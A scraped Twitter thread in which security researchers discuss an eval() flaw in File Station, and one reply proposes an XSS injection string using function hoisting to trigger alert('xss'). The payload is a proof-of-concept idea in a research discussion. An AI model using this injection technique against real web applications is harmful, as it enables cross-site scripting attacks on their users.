Things I did as an intern two Summers ago
https://twitter.com/NCCsecurityUS/status/849971823618007040 …
-
-
Replying to @jnollz
Re the eval() in File Station: Was it in top-level context?
1 reply 0 retweets 0 likes -
If so, eval('callback = window.opener.' + 'a; function opener(){}; alert("xss")') might work?
1 reply 0 retweets 0 likes
(The definition of "opener" gets hoisted, so by the time "window.opener" is evaluated, it evaluates to the function, avoiding the error.)
8:18 PM - 11 Apr 2017
0 replies
0 retweets
0 likes
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.